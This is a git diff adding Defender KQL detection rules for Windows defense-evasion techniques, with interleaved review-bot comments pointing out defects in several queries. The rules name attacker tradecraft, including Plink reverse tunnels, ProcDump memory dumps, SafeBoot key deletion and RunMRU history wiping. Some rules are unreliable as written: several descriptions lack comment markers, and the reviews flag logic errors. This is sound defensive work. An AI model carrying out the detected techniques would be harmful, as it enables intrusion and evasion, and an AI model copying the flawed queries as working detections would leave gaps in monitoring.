+// Title: Renamed Msdt.EXE Execution
+// Author: pH-T (Nextron Systems)
+// Date: 2022-06-03
+// Level: high
+// Description: Detects the execution of a renamed "Msdt.exe" binary
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.003
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessVersionInfoOriginalFileName =~ "msdt.exe" and (not(FolderPath endswith "\\msdt.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/renamed_office_binary_execution.kql b/KQL/rules/Defense Evasion/renamed_office_binary_execution.kql
new file mode 100644
index 00000000..154c5e14
--- /dev/null
+++ b/KQL/rules/Defense Evasion/renamed_office_binary_execution.kql
@@ -0,0 +1,10 @@
+// Title: Renamed Office Binary Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-20
+// Level: high
+// Description: Detects the execution of a renamed office binary
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where ((ProcessVersionInfoOriginalFileName in~ ("Excel.exe", "MSACCESS.EXE", "MSPUB.EXE", "OneNote.exe", "OneNoteM.exe", "OUTLOOK.EXE", "POWERPNT.EXE", "WinWord.exe")) or (ProcessVersionInfoFileDescription in~ ("Microsoft Access", "Microsoft Excel", "Microsoft OneNote", "Microsoft Outlook", "Microsoft PowerPoint", "Microsoft Publisher", "Microsoft Word", "Sent to OneNote Tool"))) and (not((FolderPath endswith "\\EXCEL.exe" or FolderPath endswith "\\excelcnv.exe" or FolderPath endswith "\\MSACCESS.exe" or FolderPath endswith "\\MSPUB.EXE" or FolderPath endswith "\\ONENOTE.EXE" or FolderPath endswith "\\ONENOTEM.EXE" or FolderPath endswith "\\OUTLOOK.EXE" or FolderPath endswith "\\POWERPNT.EXE" or FolderPath endswith "\\WINWORD.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/renamed_plink_execution.kql b/KQL/rules/Defense Evasion/renamed_plink_execution.kql
new file mode 100644
index 00000000..9e8efea5
--- /dev/null
+++ b/KQL/rules/Defense Evasion/renamed_plink_execution.kql
@@ -0,0 +1,10 @@
+// Title: Renamed Plink Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-06
+// Level: high
+// Description: Detects the execution of a renamed version of the Plink binary
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+
+DeviceProcessEvents
+| where (ProcessVersionInfoOriginalFileName =~ "Plink" or (ProcessCommandLine contains " -l forward" and ProcessCommandLine contains " -P " and ProcessCommandLine contains " -R ")) and (not(FolderPath endswith "\\plink.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/renamed_procdump_execution.kql b/KQL/rules/Defense Evasion/renamed_procdump_execution.kql
new file mode 100644
index 00000000..29d72669
--- /dev/null
+++ b/KQL/rules/Defense Evasion/renamed_procdump_execution.kql
@@ -0,0 +1,15 @@
+// Title: Renamed ProcDump Execution
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-11-18
+// Level: high
+// Description: Detects the execution of a renamed ProcDump executable.
+This often done by attackers or malware in order to evade defensive mechanisms.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.003
+// False Positives:
+// - Procdump illegally bundled with legitimate software.
+// - Administrators who rename binaries (should be investigated).
+
+DeviceProcessEvents
+| where (ProcessVersionInfoOriginalFileName =~ "procdump" or ((ProcessCommandLine contains " -ma " or ProcessCommandLine contains " /ma " or ProcessCommandLine contains " –ma " or ProcessCommandLine contains " —ma " or ProcessCommandLine contains " ―ma " or ProcessCommandLine contains " -mp " or ProcessCommandLine contains " /mp " or ProcessCommandLine contains " –mp " or ProcessCommandLine contains " —mp " or ProcessCommandLine contains " ―mp ") and (ProcessCommandLine contains " -accepteula" or ProcessCommandLine contains " /accepteula" or ProcessCommandLine contains " –accepteula" or ProcessCommandLine contains " —accepteula" or ProcessCommandLine contains " ―accepteula"))) and (not((FolderPath endswith "\\procdump.exe" or FolderPath endswith "\\procdump64.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/renamed_remote_utilities_rat_rurat_execution.kql b/KQL/rules/Defense Evasion/renamed_remote_utilities_rat_rurat_execution.kql
new file mode 100644
index 00000000..0fc7e3ce
--- /dev/null
+++ b/KQL/rules/Defense Evasion/renamed_remote_utilities_rat_rurat_execution.kql
@@ -0,0 +1,10 @@
+// Title: Renamed Remote Utilities RAT (RURAT) Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-19
+// Level: medium
+// Description: Detects execution of renamed Remote Utilities (RURAT) via Product PE header field
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.collection, attack.command-and-control, attack.discovery, attack.s0592
+
+DeviceProcessEvents
+| where ProcessVersionInfoProductName =~ "Remote Utilities" and (not((FolderPath endswith "\\rutserv.exe" or FolderPath endswith "\\rfusclient.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/response_file_execution_via_odbcconf_exe.kql b/KQL/rules/Defense Evasion/response_file_execution_via_odbcconf_exe.kql
new file mode 100644
index 00000000..83e9adf3
--- /dev/null
+++ b/KQL/rules/Defense Evasion/response_file_execution_via_odbcconf_exe.kql
@@ -0,0 +1,12 @@
+// Title: Response File Execution Via Odbcconf.EXE
+// Author: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-22
+// Level: medium
+// Description: Detects execution of "odbcconf" with the "-f" flag in order to load a response file which might contain a malicious action.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.008
+// False Positives:
+// - The rule is looking for any usage of response file, which might generate false positive when this function is used legitimately. Investigate the contents of the ".rsp" file to determine if it is malicious and apply additional filters if necessary.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -f " or ProcessCommandLine contains " /f " or ProcessCommandLine contains " –f " or ProcessCommandLine contains " —f " or ProcessCommandLine contains " ―f ") and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe") and ProcessCommandLine contains ".rsp"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/root_certificate_installed_from_susp_locations.kql b/KQL/rules/Defense Evasion/root_certificate_installed_from_susp_locations.kql
new file mode 100644
index 00000000..6fae094c
--- /dev/null
+++ b/KQL/rules/Defense Evasion/root_certificate_installed_from_susp_locations.kql
@@ -0,0 +1,12 @@
+// Title: Root Certificate Installed From Susp Locations
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-09
+// Level: high
+// Description: Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1553.004
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains ":\\Windows\\TEMP\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Perflogs\\" or ProcessCommandLine contains ":\\Users\\Public\\") and (ProcessCommandLine contains "Import-Certificate" and ProcessCommandLine contains " -FilePath " and ProcessCommandLine contains "Cert:\\LocalMachine\\Root")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/run_powershell_script_from_ads.kql b/KQL/rules/Defense Evasion/run_powershell_script_from_ads.kql
new file mode 100644
index 00000000..12d6b11e
--- /dev/null
+++ b/KQL/rules/Defense Evasion/run_powershell_script_from_ads.kql
@@ -0,0 +1,10 @@
+// Title: Run PowerShell Script from ADS
+// Author: Sergey Soldatov, Kaspersky Lab, oscd.community
+// Date: 2019-10-30
+// Level: high
+// Description: Detects PowerShell script execution from Alternate Data Stream (ADS)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.004
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Get-Content" and ProcessCommandLine contains "-Stream") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/run_powershell_script_from_redirected_input_stream.kql b/KQL/rules/Defense Evasion/run_powershell_script_from_redirected_input_stream.kql
new file mode 100644
index 00000000..fbaa2c0d
--- /dev/null
+++ b/KQL/rules/Defense Evasion/run_powershell_script_from_redirected_input_stream.kql
@@ -0,0 +1,10 @@
+// Title: Run PowerShell Script from Redirected Input Stream
+// Author: Moriarty Meng (idea), Anton Kutepov (rule), oscd.community
+// Date: 2020-10-17
+// Level: high
+// Description: Detects PowerShell script execution via input stream redirect
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where ProcessCommandLine matches regex "\\s-\\s*<" and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/rundll32_execution_with_uncommon_dll_extension.kql b/KQL/rules/Defense Evasion/rundll32_execution_with_uncommon_dll_extension.kql
new file mode 100644
index 00000000..01708432
--- /dev/null
+++ b/KQL/rules/Defense Evasion/rundll32_execution_with_uncommon_dll_extension.kql
@@ -0,0 +1,10 @@
+// Title: Rundll32 Execution With Uncommon DLL Extension
+// Author: Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou
+// Date: 2022-01-13
+// Level: medium
+// Description: Detects the execution of rundll32 with a command line that doesn't contain a common extension
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and (not((ProcessCommandLine =~ "" or ((ProcessCommandLine contains ".cpl " or ProcessCommandLine contains ".cpl," or ProcessCommandLine contains ".cpl\"" or ProcessCommandLine contains ".cpl'" or ProcessCommandLine contains ".dll " or ProcessCommandLine contains ".dll," or ProcessCommandLine contains ".dll\"" or ProcessCommandLine contains ".dll'" or ProcessCommandLine contains ".inf " or ProcessCommandLine contains ".inf," or ProcessCommandLine contains ".inf\"" or ProcessCommandLine contains ".inf'") or (ProcessCommandLine endswith ".cpl" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".inf")) or ProcessCommandLine contains " -localserver " or isnull(ProcessCommandLine) or ((ProcessCommandLine contains ":\\Windows\\Installer\\" and ProcessCommandLine contains ".tmp" and ProcessCommandLine contains "zzzzInvokeManagedCustomActionOutOfProc") and InitiatingProcessFolderPath endswith "\\msiexec.exe")))) and (not((InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\AppData\\Local\\Microsoft\\EdgeUpdate\\Install\\{" and InitiatingProcessCommandLine contains "\\EDGEMITMP_" and InitiatingProcessCommandLine contains ".tmp\\setup.exe" and InitiatingProcessCommandLine contains "--install-archive=" and InitiatingProcessCommandLine contains "--previous-version=" and InitiatingProcessCommandLine contains "--msedgewebview --verbose-logging --do-not-launch-msedge --user-level")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/rundll32_execution_without_commandline_parameters.kql b/KQL/rules/Defense Evasion/rundll32_execution_without_commandline_parameters.kql
new file mode 100644
index 00000000..fc1730b5
--- /dev/null
+++ b/KQL/rules/Defense Evasion/rundll32_execution_without_commandline_parameters.kql
@@ -0,0 +1,12 @@
+// Title: Rundll32 Execution Without CommandLine Parameters
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-05-27
+// Level: high
+// Description: Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202
+// False Positives:
+// - Possible but rare
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith "\\rundll32.exe" or ProcessCommandLine endswith "\\rundll32.exe\"" or ProcessCommandLine endswith "\\rundll32") and (not((InitiatingProcessFolderPath contains "\\AppData\\Local\\" or InitiatingProcessFolderPath contains "\\Microsoft\\Edge\\")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/rundll32_installscreensaver_execution.kql b/KQL/rules/Defense Evasion/rundll32_installscreensaver_execution.kql
new file mode 100644
index 00000000..2542ed68
--- /dev/null
+++ b/KQL/rules/Defense Evasion/rundll32_installscreensaver_execution.kql
@@ -0,0 +1,12 @@
+// Title: Rundll32 InstallScreenSaver Execution
+// Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io, TactiKoolSec
+// Date: 2022-04-28
+// Level: medium
+// Description: An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver
+// MITRE Tactic: Defense Evasion
+// Tags: attack.t1218.011, attack.defense-evasion
+// False Positives:
+// - Legitimate installation of a new screensaver
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "InstallScreenSaver" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/rundll32_internet_connection.kql b/KQL/rules/Defense Evasion/rundll32_internet_connection.kql
new file mode 100644
index 00000000..330ad0cd
--- /dev/null
+++ b/KQL/rules/Defense Evasion/rundll32_internet_connection.kql
@@ -0,0 +1,12 @@
+// Title: Rundll32 Internet Connection
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-11-04
+// Level: medium
+// Description: Detects a rundll32 that communicates with public IP addresses
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011, attack.execution
+// False Positives:
+// - Communication to other corporate systems that use IP addresses from public address spaces
+
+DeviceNetworkEvents
+| where InitiatingProcessFolderPath endswith "\\rundll32.exe" and (not((InitiatingProcessCommandLine endswith "\\system32\\PcaSvc.dll,PcaPatchSdbTask" or DeviceName endswith ".internal.cloudapp.net" or (ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")) or (ipv4_is_in_range(RemoteIP, "20.0.0.0/8") or ipv4_is_in_range(RemoteIP, "51.103.0.0/16") or ipv4_is_in_range(RemoteIP, "51.104.0.0/16") or ipv4_is_in_range(RemoteIP, "51.105.0.0/16")) or (RemotePort == 443 and InitiatingProcessParentFileName =~ "svchost.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/rundll32_spawned_via_explorer_exe.kql b/KQL/rules/Defense Evasion/rundll32_spawned_via_explorer_exe.kql
new file mode 100644
index 00000000..ab0ec4f3
--- /dev/null
+++ b/KQL/rules/Defense Evasion/rundll32_spawned_via_explorer_exe.kql
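Review bot: The exclusion list in the `where` line passes IPv6 ranges (`"::1/128"`, `"fe80::/10"`, `"fc00::/7"`) to `ipv4_is_in_range()`, which only understands IPv4 and returns null for them; worse, when `RemoteIP` itself is an IPv6 address every `ipv4_is_in_range()` term becomes null, the `or` chain evaluates to null, `not(null)` is null and the row is filtered out, so IPv6 rundll32 connections are silently dropped instead of being flagged. Use `ipv6_is_in_range(RemoteIP, ...)` for the IPv6 prefixes, or replace the whole private/link-local/loopback group with the table's `RemoteIPType == "Public"` column, which is what the rule title actually asks for. The Azure ranges (`20.0.0.0/8`, `51.103.0.0/16`, ...) and the `RemotePort == 443` filter would stay as separate terms.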
@@ -0,0 +1,10 @@
+// Title: Rundll32 Spawned Via Explorer.EXE
+// Author: CD_ROM_
+// Date: 2022-05-21
+// Level: medium
+// Description: Detects execution of "rundll32.exe" with a parent process of Explorer.exe. This has been observed by variants of Raspberry Robin, as first reported by Red Canary.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and InitiatingProcessFolderPath endswith "\\explorer.exe") and (not((ProcessCommandLine contains " C:\\Windows\\System32\\" or ProcessCommandLine endswith " -localserver 22d8c27b-47a1-48d1-ad08-7da7abd79617")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/rundll32_spawning_explorer.kql b/KQL/rules/Defense Evasion/rundll32_spawning_explorer.kql
new file mode 100644
index 00000000..9a627673
--- /dev/null
+++ b/KQL/rules/Defense Evasion/rundll32_spawning_explorer.kql
@@ -0,0 +1,10 @@
+// Title: RunDLL32 Spawning Explorer
+// Author: elhoim, CD_ROM_
+// Date: 2022-04-27
+// Level: high
+// Description: Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\explorer.exe" and InitiatingProcessFolderPath endswith "\\rundll32.exe") and (not(InitiatingProcessCommandLine contains "\\shell32.dll,Control_RunDLL"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/rundll32_unc_path_execution.kql b/KQL/rules/Defense Evasion/rundll32_unc_path_execution.kql
new file mode 100644
index 00000000..a3ae7d5a
--- /dev/null
+++ b/KQL/rules/Defense Evasion/rundll32_unc_path_execution.kql
@@ -0,0 +1,12 @@
+// Title: Rundll32 UNC Path Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-10
+// Level: high
+// Description: Detects rundll32 execution where the DLL is located on a remote location (share)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.lateral-movement, attack.t1021.002, attack.t1218.011
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " \\\\" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or ProcessCommandLine contains "rundll32")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/runmru_registry_key_deletion.kql b/KQL/rules/Defense Evasion/runmru_registry_key_deletion.kql
new file mode 100644
index 00000000..c1d66e6c
--- /dev/null
+++ b/KQL/rules/Defense Evasion/runmru_registry_key_deletion.kql
@@ -0,0 +1,13 @@
+// Title: RunMRU Registry Key Deletion
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-09-25
+// Level: high
+// Description: Detects deletion of the RunMRU registry key, which stores the history of commands executed via the Run dialog.
+In the clickfix techniques, the phishing lures instruct users to open a run dialog through (Win + R) and execute malicious commands.
+Adversaries may delete this key to cover their tracks after executing commands.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.003
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " del" and ProcessCommandLine contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/runmru_registry_key_deletion_registry.kql b/KQL/rules/Defense Evasion/runmru_registry_key_deletion_registry.kql
new file mode 100644
index 00000000..21243bfb
--- /dev/null
+++ b/KQL/rules/Defense Evasion/runmru_registry_key_deletion_registry.kql
@@ -0,0 +1,13 @@
+// Title: RunMRU Registry Key Deletion - Registry
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-09-25
+// Level: high
+// Description: Detects attempts to delete the RunMRU registry key, which stores the history of commands executed via the run dialog.
+In the clickfix techniques, the phishing lures instruct users to open a run dialog through (Win + R) and execute malicious commands.
+Adversaries may delete this key to cover their tracks after executing commands.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.003
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/safeboot_registry_key_deleted_via_reg_exe.kql b/KQL/rules/Defense Evasion/safeboot_registry_key_deleted_via_reg_exe.kql
new file mode 100644
index 00000000..194f598a
--- /dev/null
+++ b/KQL/rules/Defense Evasion/safeboot_registry_key_deleted_via_reg_exe.kql
@@ -0,0 +1,12 @@
+// Title: SafeBoot Registry Key Deleted Via Reg.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems), Tim Shelton
+// Date: 2022-08-08
+// Level: high
+// Description: Detects execution of "reg.exe" commands with the "delete" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " delete " and ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot") and (FolderPath endswith "reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")
\ No newline at end of file
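Review bot: The `where` line of runmru_registry_key_deletion_registry filters only on `RegistryKey endswith "...\\Explorer\\RunMRU"` and carries no `ActionType` condition, so this `high` rule fires on every write to RunMRU — i.e. on every ordinary use of the Run dialog — rather than on the deletion the title and description promise. The source rule's event type appears to have been lost in conversion (compare the index/SD-value rules at the start of this chunk, which do keep `ActionType in~ (...)`). Restrict it to deletions, e.g. `| where ActionType in~ ("RegistryKeyDeleted", "RegistryValueDeleted") and RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU"`.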
diff --git a/KQL/rules/Defense Evasion/scr_file_write_event.kql b/KQL/rules/Defense Evasion/scr_file_write_event.kql
new file mode 100644
index 00000000..b69329c3
--- /dev/null
+++ b/KQL/rules/Defense Evasion/scr_file_write_event.kql
@@ -0,0 +1,12 @@
+// Title: SCR File Write Event
+// Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io
+// Date: 2022-04-27
+// Level: medium
+// Description: Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an ".SCR" file using "rundll32.exe desk.cpl,InstallScreenSaver" for example.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011
+// False Positives:
+// - The installation of new screen savers by third party software
+
+DeviceFileEvents
+| where FolderPath endswith ".scr" and (not((FolderPath contains ":\\$WINDOWS.~BT\\NewOS\\" or FolderPath contains ":\\Windows\\System32\\" or FolderPath contains ":\\Windows\\SysWOW64\\" or FolderPath contains ":\\Windows\\WinSxS\\" or FolderPath contains ":\\WUDownloadCache\\")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/screensaver_registry_key_set.kql b/KQL/rules/Defense Evasion/screensaver_registry_key_set.kql
new file mode 100644
index 00000000..89df8598
--- /dev/null
+++ b/KQL/rules/Defense Evasion/screensaver_registry_key_set.kql
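Review bot: The `where` line of scr_file_write_event has no `ActionType` filter, so a query over DeviceFileEvents matches deletions, modifications and renames of existing .scr files as well as the creations the description says it detects; the source file_event rule's semantics appear to have been dropped by the converter. Adding `ActionType in~ ("FileCreated", "FileRenamed")` at the start of the predicate narrows it back to new files appearing outside the excluded system folders. The `FolderPath endswith ".scr"` check is fine as-is since `endswith` is case-insensitive in KQL.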
@@ -0,0 +1,12 @@
+// Title: ScreenSaver Registry Key Set
+// Author: Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)
+// Date: 2022-05-04
+// Level: medium
+// Description: Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011
+// False Positives:
+// - Legitimate use of screen saver
+
+DeviceRegistryEvents
+| where InitiatingProcessFolderPath endswith "\\rundll32.exe" and (RegistryValueData endswith ".scr" and RegistryKey contains "\\Control Panel\\Desktop\\SCRNSAVE.EXE") and (not((RegistryValueData contains "C:\\Windows\\System32\\" or RegistryValueData contains "C:\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/scripted_diagnostics_turn_off_check_enabled_registry.kql b/KQL/rules/Defense Evasion/scripted_diagnostics_turn_off_check_enabled_registry.kql
new file mode 100644
index 00000000..28cced97
--- /dev/null
+++ b/KQL/rules/Defense Evasion/scripted_diagnostics_turn_off_check_enabled_registry.kql
@@ -0,0 +1,12 @@
+// Title: Scripted Diagnostics Turn Off Check Enabled - Registry
+// Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io
+// Date: 2022-06-15
+// Level: medium
+// Description: Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Administrator actions
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Policies\\Microsoft\\Windows\\ScriptedDiagnostics\\TurnOffCheck"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/scripting_commandline_process_spawned_regsvr32.kql b/KQL/rules/Defense Evasion/scripting_commandline_process_spawned_regsvr32.kql
new file mode 100644
index 00000000..e40543bc
--- /dev/null
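Review bot: `RegistryValueData =~ "DWORD (0x00000001)"` in scripted_diagnostics_turn_off_check_enabled_registry is the Sysmon rendering of a DWORD value copied through from the Sigma source; as far as I know DeviceRegistryEvents stores `RegistryValueData` as the plain value string (a DWORD of 1 appears as `"1"`), so this comparison would never match — please verify against live data and, if so, use `RegistryValueData == "1"` (or `toint(RegistryValueData) == 1`). The same hunk, like screensaver_registry_key_set above it (`RegistryKey contains "...\\Desktop\\SCRNSAVE.EXE"`), also matches a value name (`TurnOffCheck`, `SCRNSAVE.EXE`) against `RegistryKey`; in this table the value name is a separate column, so `RegistryKey endswith "\\ScriptedDiagnostics" and RegistryValueName =~ "TurnOffCheck"` is the shape that should be checked against the schema.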
+++ b/KQL/rules/Defense Evasion/scripting_commandline_process_spawned_regsvr32.kql
@@ -0,0 +1,13 @@
+// Title: Scripting/CommandLine Process Spawned Regsvr32
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-26
+// Level: medium
+// Description: Detects various command line and scripting engines/processes such as "PowerShell", "Wscript", "Cmd", etc. spawning a "regsvr32" instance.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.010
+// False Positives:
+// - Legitimate ".bat", ".hta", ".ps1" or ".vbs" scripts leverage legitimately often. Apply additional filter and exclusions as necessary
+// - Some legitimate Windows services
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\regsvr32.exe" and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe")) and (not((ProcessCommandLine endswith " /s C:\\Windows\\System32\\RpcProxy\\RpcProxy.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\cmd.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/sdclt_child_processes.kql b/KQL/rules/Defense Evasion/sdclt_child_processes.kql
new file mode 100644
index 00000000..fd5192cf
--- /dev/null
+++ b/KQL/rules/Defense Evasion/sdclt_child_processes.kql
@@ -0,0 +1,10 @@
+// Title: Sdclt Child Processes
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-05-02
+// Level: medium
+// Description: A General detection for sdclt spawning new processes. This could be an indicator of sdclt being used for bypass UAC techniques.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\sdclt.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/sdiagnhost_calling_suspicious_child_process.kql b/KQL/rules/Defense Evasion/sdiagnhost_calling_suspicious_child_process.kql
new file mode 100644
index 00000000..b5db0b02
--- /dev/null
+++ b/KQL/rules/Defense Evasion/sdiagnhost_calling_suspicious_child_process.kql
@@ -0,0 +1,10 @@
+// Title: Sdiagnhost Calling Suspicious Child Process
+// Author: Nextron Systems, @Kostastsale
+// Date: 2022-06-01
+// Level: high
+// Description: Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036, attack.t1218
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\taskkill.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\calc.exe") and InitiatingProcessFolderPath endswith "\\sdiagnhost.exe") and (not(((ProcessCommandLine contains "bits" and FolderPath endswith "\\cmd.exe") or ((ProcessCommandLine endswith "-noprofile -" or ProcessCommandLine endswith "-noprofile") and FolderPath endswith "\\powershell.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/security_service_disabled_via_reg_exe.kql b/KQL/rules/Defense Evasion/security_service_disabled_via_reg_exe.kql
new file mode 100644
